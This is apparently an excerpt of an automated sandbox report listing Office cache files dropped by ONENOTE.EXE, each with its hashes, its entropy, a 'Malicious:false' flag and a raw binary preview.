                                                                                                                                                                                                              Preview:2...>.....................................................................................................................................................................................................W.......Wq...F..]0......|.......|..%C.T+.jE(...|..%C.T+.jE(...|...Wq...F..]0......W................................W.......W...................................................W.."....W\......WN......................................................|..c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s................W..1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..........g..g..N.[?..,......N...^............................................................................................................g..g..N.[?..,......................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.47266446354413616
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcellufreolXDreoO8llu51botlyLx8Olu3af3ww1EqM:Vcellu7lTzr/DV383wQEqM
                                                                                                                                                                                                              MD5:B62FD525B67BCFBC86F856E3032D786E
                                                                                                                                                                                                              SHA1:D3A7B6BB47D558B516000389BCFAFEEE1203E239
                                                                                                                                                                                                              SHA-256:D883C8B62022D5F60D2A07E24FD7B692A16348B5375628C8927B5EB15FD76FB6
                                                                                                                                                                                                              SHA-512:7654E104BF76FF1F6AF1B40BB9E45805576FC54C46AD41BAB7B0ABDD5F83B76347607F11C43A447A4DBB4EA90FBCB989F28814792E96DBB3A5AF5E1963BD3D2F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.........................................................................................................................................................................................U.......Uz@..A../...M..........................Uz@..A../...M..U....................................................U.......U...................................................U.......U\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...t%.*gB.@.......S....N...^...........................................................................................................t%.*gB.@.......S............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.6416010012825467
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:UeEE0t2WqJ/d6r4nkNYKQQnkNYIuQEOO:UinjJFBkNbQQkNU
                                                                                                                                                                                                              MD5:987A6E3A569A40496A97700F0CD85C73
                                                                                                                                                                                                              SHA1:44214F0FB25127CBA9CB0536D311A45189BD21EF
                                                                                                                                                                                                              SHA-256:4D99DA490061C8AB0B1F8893BB461080FA13343FCC0C099756BB4FADB745C811
                                                                                                                                                                                                              SHA-512:8D59ED06908B9BA8490A3ACC4F58035CF97F24B3AA4330DCA8D724AF8939D8E1B399BBF83259EDD5E380871CB4E313FA4411EEEDF5F0FE34264955038703A0F0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................&......&....L..j.D.r.........................&....L..j.D.r.&...................................................&......&..................................................&..."..&.\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............H.;.P.h.!....N...^.................................................................................................................H.;.P.h.!............................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7917072259202652
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:+wfEffFyIIpFVwxU6jUIsD4anwsD4CgjlQEijN:+IJGvnawnBhG
                                                                                                                                                                                                              MD5:23CCC36C471DE186C51053A5C7E24D51
                                                                                                                                                                                                              SHA1:CE92E6F46B3CA7C38790741FBAB0FF15F7EE2792
                                                                                                                                                                                                              SHA-256:705C28CBEB020951E0EF9756656F6BD68422FDA22FEB32B35648EC184DA10853
                                                                                                                                                                                                              SHA-512:74102A4FCA898839EE278190EEFF9CBEE3DF7146F66AB7574F45D33B48663C180287E199DD5D857AE62005BE6AF43857D1D9EBF5AB8A6F2E4A4BFE5120ED2BBE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................fZ}.....fZ}K.g=A.6...i]Z|(......|(.;.3A.P:....|(.;.3A.P:....|(..fZ}K.g=A.6...i]ZfZ}..............................fZ}.....fZ}.................................................fZ}..#..fZ}\....fZ}N....................................................|(...c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..............fZ}..1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s.........I...%g.O....|.O....N...^...........................................................................................................I...%g.O....|.O....................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.47992039654367435
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTczMYflyLx8Olu3afgL3ek/jcw1EVR3ek/tK:VczTlV38gL37/wQEv37/tK
                                                                                                                                                                                                              MD5:1B899A4C2615051646B51206E501E0EC
                                                                                                                                                                                                              SHA1:FEC6CA8D3E7A30E4CF7057C819FD9C3AA899140B
                                                                                                                                                                                                              SHA-256:5A74EAAA2EBA10A032FEBE20966B8CB57211BA985641552C8DA8A7143BADEFCD
                                                                                                                                                                                                              SHA-512:274C780346CCAA6AEB5F9A091450686E521B83294BD3AA51E85C1EE080013EEFE5DE19306713E7A886FC89CC8A6E8CD3FB9E91D8104E1D5FA792E12BCF299FF2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~........................................................................................................................................................................................<0......<0...O...f5..I.........................<0...O...f5..I.<0...................................................<0......<0..................................................<0......<0\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....|.9..D.>+k.w.$....N...^............................................................................................................|.9..D.>+k.w.$............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.4601270412079246
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:RpX8q+aqzryjK1heWD1fFF2AsfWoSg+cxPxBH7HF56oUWQEwXRoUG:vXlCryjKOWpFFPs+XgFxjbD65WEh5
                                                                                                                                                                                                              MD5:EE0CA34E9A30F9274FF51737FB49F36A
                                                                                                                                                                                                              SHA1:32A9068C6DEA45C996BBF5963AD2E8D88E0D1CDB
                                                                                                                                                                                                              SHA-256:301C45D3B8CF8D7AA6D35C0A5C8BC47DD4AD6F4AC469C1E4C4F21BE73B4E8F1E
                                                                                                                                                                                                              SHA-512:4618F30538EF35E92792B2F3BB3B58089254B1F3BFE576BC4ECAF627100F96506C94184F24FC37D2A73B904331BB8E0749FCE67ADA1E23AED6AF5CBE4EBDC8AD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........ ...............................................................................................................................................................................................?._.....?._.;.N...................E..X......d... .E...Y&.D.d........E..X.........V.d.O...yO}.c.V............d.......d...................................................d...@...d.\.....d.N.....d.N.)...d.N.6...d.N.>..............................c..,.........................4..1...(...(.......U.s.e.r.........d...1... ..$....U.s.e.r............d.......d... .E...Y&.D.V.......V.d.O...yO}.c2...............................?._......................................V...c..,....................d...d...1... ..$....U.s.e.r...........QxK.#...?.-....?._.;.N......?._..V.d.O...yO}.c.V......>.....................E..X..............................................?._..c..,....................d...d...d...1... ..$....U.s.e.r.......................QxK.#...?.-.............E..X.............
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7211300824868273
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:jxfEZ3XGSbipes0lnKpqFlgncp/lOlxAnIx8CAXCkHaDWAXlapfcw1EapRK:KxVbZlgncRlOghXnHaD9XladcQEau
                                                                                                                                                                                                              MD5:0758637C804D0D7C359FF627D977F341
                                                                                                                                                                                                              SHA1:C06E071891A51D0A92F59FE8E5636DFC8B0538CC
                                                                                                                                                                                                              SHA-256:1A6D38BFF2C740AB40E9878A7F5C1E0128C252107B826BAFC58F5ADB112B38E1
                                                                                                                                                                                                              SHA-512:4DFCCA320536A7C22FADA90AA0F07AA2A2B8646B4B2DC2DD5D0FE7764A6CCC234F094802E245A641E1769296B3D5C0C9B9308F0AA0682D36F926D0248D10AF6E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>....................................................................................................................................................................................................9.......9..P..D../,U8..............}.K....ch...9..P..D../,U8...9......}.K....ch....................................................................................................!.....\.......N.....................................................9...c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...............1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..............2.R@V.O.EPhM.......N...^............................................................................................................2.R@V.O.EPhM...............................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.48277285611290865
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTc0ennnKtAcMv5/yLx8Olu3afp9Hucw1EtY9H8K:Vcdnnmm/V38fQEt5K
                                                                                                                                                                                                              MD5:421B4BD2B2977ED982331FE04A5C6B99
                                                                                                                                                                                                              SHA1:A5F3A34DBA0C580E249E052951FCABC892173F5C
                                                                                                                                                                                                              SHA-256:32EB9F722A28BC113668D8E7A997F46573DC2919D11C5AC28A2585DDB12C16FC
                                                                                                                                                                                                              SHA-512:20B8927C39EC18E6C80C0E9A58EA159771A9379259CFAB25AA694BD6D294516A78EB4FB3CCC084EB1AF766E2391DC1EFC24886220684514B783CF80813E06F6F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.....................................................................................................................................................................................................O..i3.{................................O..i3.{..............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...[.B...I...`..6.....N...^...........................................................................................................[.B...I...`..6.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7317561694923703
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:KUCYWCUZ/ir4Gm7Irw6eIWAW7eIWc1JQEj:KUHWCmiOCw6m7z
                                                                                                                                                                                                              MD5:349F268E03B42FDB2287C9A57B1B78A9
                                                                                                                                                                                                              SHA1:F3DDDC55BBA8181BE651966B80F4775B85744DA9
                                                                                                                                                                                                              SHA-256:18B4E80DE6C0047D4384D87AE06D7BFD940BB5977F1F31E71CE5C4BAF29B13C1
                                                                                                                                                                                                              SHA-512:8FC533AC301ADE24EBD2185B09EB1D4261ADFEEB66121B93E026AD4FBB996B6FB81DCB77B4D0FD11A780CF7342EE8FB5D588E6709431A7F661CAE531AD179A3D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...............................................................................................................................................................................................................D[.D.X%{.............z...J.+..........D[.D.X%{..........z...J.+...................................................................................................."....\......N.........................................................c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..................1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........P.!}i.dG...hW0M.....N...^...........................................................................................................P.!}i.dG...hW0M.....................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.4811237136563258
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcyR5Hz+529l3+tyLx8Olu3afj0w1E4I:Vc+5q5OqV38YQEB
                                                                                                                                                                                                              MD5:C73F2B17DAD04BB61C17219254B3BFEF
                                                                                                                                                                                                              SHA1:ABC1271243FE872332421BCF65A85CDC3DD8ED80
                                                                                                                                                                                                              SHA-256:1BADD59D7E39FFBB3703AA93BBAA3C23B3EFA20DEF304C63C9EAC899A75F5489
                                                                                                                                                                                                              SHA-512:BC3257A763CC873F64FF5E56C81ECFF00A1912685B31014D5487426EFFE2C9E28F443ADA24BA16751638023C9E1C96AD2B4EB70BB726FE69BAD0E16CFE5B735D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.......................................................................................................................................................................................b.J.....b.Jvz..C.m..6..C........................b.Jvz..C.m..6..Cb.J..................................................b.J.....b.J.................................................b.J.....b.J\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3.... .1.uF...v.LU.....N...^............................................................................................................ .1.uF...v.LU.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.6484089490864453
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:UeEJzoRl/9Gu+EnkNYKQQnkNYSMxcQEYMS:USt9Gu+EkNbQQkNfec0
                                                                                                                                                                                                              MD5:593F201CFD2A8948F1342470D0CF45A6
                                                                                                                                                                                                              SHA1:7C2B24C40E15343B25BCC119C7D0E1FC978FA7E6
                                                                                                                                                                                                              SHA-256:F9EAC3C7DA45B4E53394D0E5AC98CBE979E28CBC7A2AE6CD54FF83ADEEC51C3D
                                                                                                                                                                                                              SHA-512:1412A42D0FCF73A788DB6E63DF0EBB6E9D0493926EF2B4CDDC19CB09410FF2062784586481F2EFAD449B60A5E838A957AF8559C4E5D647D1EB1058732E1217C6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.....................................................................................................................................................................................................?.......?.u..B.O.(*tR...........................?.u..B.O.(*tR...?....................................................?.......?...................................................?.."....?\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.........5.?.@.G...6........N...^...........................................................................................................5.?.@.G...6................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7952957068761083
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:+wxRXE+MEntDHPR9WERU02Ix80cHnD2nHlXT3wcHnD2nHlEL0qB1cw1E10qBbK:+wfE+xtDvrWER/rsD45wsD4C91cQE/G
                                                                                                                                                                                                              MD5:B020D8EA092E3374BA1810DACF72E2D2
                                                                                                                                                                                                              SHA1:D332ECB94E7F52145E40E212FD5190EE2809D1C2
                                                                                                                                                                                                              SHA-256:DE2ECF51F08723240FBF8D6A79B1D0909E94E540D30E85B31677F312774AFBC2
                                                                                                                                                                                                              SHA-512:CA264DC384772E3E2F3FA70E7F39063AFD27035625B84C002D649C951689A95B018F268546EE2735DA3771CA71718C6B93D3EA004CE3754E51C010AFC66ED044
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................h.......h...YM......n_.t.......t...|pH.u!.*hw,.t...|pH.u!.*hw,.t..h...YM......n_h.................................t.......t...................................................t...#...t.\.....t.N....................................................h....c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s...............t...1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s...........y\..QD.Y.)..6.....N...^.............................................................................................................y\..QD.Y.)..6.....................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.4841180160260744
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcs5/48RiuDAqDiZyLx8Olu3afIw1EF3:Vcs5TliZV38IQEl
                                                                                                                                                                                                              MD5:E1450FC726D2912BF4DF8ED52F6BF949
                                                                                                                                                                                                              SHA1:3958445081A7CC0980B5399555A43B7C27E02759
                                                                                                                                                                                                              SHA-256:61F7584D259E65018AB8E982E1F3151AEC726DFD8667B85E695F51C6884731C2
                                                                                                                                                                                                              SHA-512:47F0A0E65BEC234B859FDCD1A97DC0676CE1B72C6250EEEF4DE84246878B9F10807CC40179ACCA3414F4CD6ED8ACEFCC02E5659060B899EB4C2DDCFF77C7CF08
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.......................................................................................................................................................................................6.&.....6.&.x..O......e........................6.&.x..O......e6.&..................................................6.&.....6.&.................................................6.&.....6.&\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...j@...e.L..K.|fC.....N...^...........................................................................................................j@...e.L..K.|fC.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.699815212267818
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:ga0C+mNmQYOL8XZgX7Vu8ZAJx8iDwV8uWDwVhQqw1EguS:ghCJNOOL84IBNDwV3WDwVh/QEgN
                                                                                                                                                                                                              MD5:18735779805D3EE85412ABCEC07866A9
                                                                                                                                                                                                              SHA1:198AF9C30CE5BB24903060F2A44B78EDC0E599C0
                                                                                                                                                                                                              SHA-256:2CBF8EF7A67B4123CACAC38D3618E2DA68B8F499CDFE47B43CBBBA7F89B69902
                                                                                                                                                                                                              SHA-512:C8981D8CAD0D657900FD84C010A62D635256C79BFA92B3C80A7A5ADA8AECFAC842FCBBA8F20E36E79750F1B49693BCA87B009CEDBFB49318BE8516304D4348A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................$.*.....$.*.G..J.0.Fq..............}.]N.....s.$.*.G..J.0.Fq..$.*.....}.]N.....s...................................................................................................!.....\.......N....................................................$.*..c..,.........................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t...............1... ..$....L.i.v.e.C.o.n.t.e.n.t...................C....~.....N...^.................................................................................................................C....~.............................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.9191746294518338
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:9/RssHrJ+gorLsAHYYB7TyKlolshIx8M15A5rAYdrJC3wOA2u/olrmw1Eju/oll0:zP4g4VvNTXl4rsPCAOxCowQEjCo/0
                                                                                                                                                                                                              MD5:C3CFFCC40C6E78DCB91584580BACD9C5
                                                                                                                                                                                                              SHA1:C90527127A0567F0C8663CF3DC729B3FACF5ABE7
                                                                                                                                                                                                              SHA-256:8BC2179705A85D5953B3AA80F00808AE7BA532802654C8180DD0AF835452BE64
                                                                                                                                                                                                              SHA-512:968387481DAF482E66D474B2501B48AA2202D3FBE0B46DD163A0C902999160E2C93A3669B1A152C3534F19A12E8547FD7C92C9B48E7BD583B6243B4ED3A71A76
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>..............................................................................................................................................................................................................y..E......b..:.......:.8b%1B.....$...:.8b%1B.....$..:..b..A..D...f.;2.b......y..E......b..............b.......b...................................................b....+..b..\....b..N....b..N.)...........................................:...c..,.........................4..1...(...(.......1.6............b....1... ..$....1.6.......b.......b..A..D...f.;2..:.......:.8b%1B.....$.2.............................................................................c..,...................b...b....1... ..$....1.6............Q...@.M.{...v<9....N...^............................................................................................................Q...@.M.{...v<9............................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:OpenPGP Public Key
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.5016695008424554
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:uWPUjN7pM6pl6cxlx91PQu1qnIUajEUasXid797BEUauiv9KnWygAD7gEUaOEUah:uci7pM6plj35KKludlIFqgAD7gl3lO
                                                                                                                                                                                                              MD5:74710F00067A270EC266E0169B21E907
                                                                                                                                                                                                              SHA1:7212FB29F176DC9208F8FF73B09487DDB815EB5B
                                                                                                                                                                                                              SHA-256:4B1A991435591AC772A2776E392E553DF9A754B92049A692A7D04F015D5F95AC
                                                                                                                                                                                                              SHA-512:7B83E620449431682A15AA26339439D952611FF4058BF35BB8A4A23880FA1575094700BE2A7FAB75180F167E2B7AD68B9B2A511C5E9BF6E86EB0FC20E75335A2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........*...............................................................................................................................................................................................Vz......Vz..w..G.".j..8...H.......H[..A.b3.......H[..A.b3.......H......(.B..r.l..q....)...AW.K.-......)............).......)...................................................)....B..)..\....)..N....)..N.*..)..N.:..)..N.@............................H..c..,.........................4..1...(...(.......M.a.n.a.g.e.d..........)....1... ..$....M.a.n.a.g.e.d.............).......)...AW.K.-...................(.B..r.l...2.................................H.).........................................c..,...................)...)....1... ..$....M.a.n.a.g.e.d..........t.......t..\.L...ng..>.............(.B..r.l..qVz..w..G.".j..8.Vz..)...AW.K.-......)....t..\.L...ng..>.t......>....................(.B..r.l..q..........................................t...c..,...................)...)...)....1... ..$....M.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7227468501643087
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:K3I/rHLBHVu6In82IXnSQ9XlWrZcQE7ra:EIT91u685IXP9wlcX
                                                                                                                                                                                                              MD5:174226F2D4A943576E4469DB05E6E1F6
                                                                                                                                                                                                              SHA1:A0717E5BC6FBBD0AF4A2A5053C90582E114E3290
                                                                                                                                                                                                              SHA-256:AB45CAF2FBDC33FDD2B8043F24767F2EFE03791A90A41991C03843057962AE6A
                                                                                                                                                                                                              SHA-512:71B0A55ECE31EC177004117069C3269138428361CEDA77C31CA7AE18CB7C484AD7BCDB6680B1A0B60977301C486C21C2E4388D516681756C78C7875495DFB356
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>................................................................................................................................................................................................................J..VQ/q_.[q......[q....E...O.H..[q....E...O.H..[q........J..VQ/q_...............................................................................................!....\......N....................................................[q...c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..............1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s.................t.G....]l.%....N...^...............................................................................................................t.G....]l.%............................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.47523041153537415
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcpVs7bs4SAIiglyLx8Olu3af83errw1E+d3ern:VcpVs744QTV38zrrQEPrn
                                                                                                                                                                                                              MD5:E51AE4260AF40E96D87B3824DDD443C8
                                                                                                                                                                                                              SHA1:87D16A221B82DC064C453243AF392A605050706F
                                                                                                                                                                                                              SHA-256:DE230C950658AFD6807C97F0A6382776F954D09C2955A515FB09DE016575BAC2
                                                                                                                                                                                                              SHA-512:FAEA7F0989941FC43088F4CB7EEFC69E8511415CD80989BD541B6A3B21FCC84B3FCB21E47748942B1F7E674B209828DF08FCE721CED89F4D41DAF756A501ABBC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.......................................................................................................................................................................................T.......T......I..0..y2.........................T......I..0..y2.T....................................................T.......T...................................................T.......T..\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3.....].0.%C..H..+......N...^.............................................................................................................].0.%C..H..+..............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7324163113789234
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:K0nCttQp43ItdbZ434dbv2f9ERJByax8felBkls0CBD7elBkls031Ww1EZ:KUCtSwIU6keIWBD7eIWc1WQEZ
                                                                                                                                                                                                              MD5:1C419EF5457C7E6D5C16666842944E37
                                                                                                                                                                                                              SHA1:3E324231D9F8F72E8D0FE0402550EC85C6C8ADB4
                                                                                                                                                                                                              SHA-256:85CB7C98E2B318EC223AF450824F8963FB55B4E6609A5DFA28CD142C6CCF28EB
                                                                                                                                                                                                              SHA-512:203B2DE7165ABCA857097442AB6A7D644CF195818D0206767ED061C88E3204CC9EAF6BB5A20CC702989F0F0A6787F7634281A1F4495DB145E11ED95A8A8CD0BE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................W......W...0J..4..1..:.......:..l..K._..0...W...0J..4..1..W..:..l..K._..0...:................................:.......:...................................................:...."..:..\....:..N....................................................W...c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..............:....1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........G.m....O.j@.~.Q.....N...^...........................................................................................................G.m....O.j@.~.Q.....................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.4803865188299943
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcF/DmKg+kZK+JsSxuJyLx8Olu3af3nqUlxmw1ESmnqUl/0:VcFb9ktsSoJV383NjmQETNa
                                                                                                                                                                                                              MD5:6C5273F9A5422699E1A205265FC8AC76
                                                                                                                                                                                                              SHA1:BD07BBC1E5337CEE2F597898FFA8E9B6DA478F03
                                                                                                                                                                                                              SHA-256:F421C07D61E3641F59FC7A07725AAE966C3ED4C6A5133CE46646F601EA1A0A91
                                                                                                                                                                                                              SHA-512:DA0C41C6698F1DA8C637C3340FCF9A0CE8DA5BE04E719567D235BFAC40BC44D7C968241C6D0A7F1A2E57E2C7C03BC1E6EC65B48506986076366A1017773724E8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.......................................................................................................................................................................................^.......^...c..M................................^...c..M........^....................................................^.......^...................................................^.......^..\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...B.....$E.WC.HkE....N...^...........................................................................................................B.....$E.WC.HkE............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.6421051349657183
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:UeEss/ZJy3Sb/qnkNYKQQnkNY2FcQEt2:UhyG/qkNbQQkNVFcR
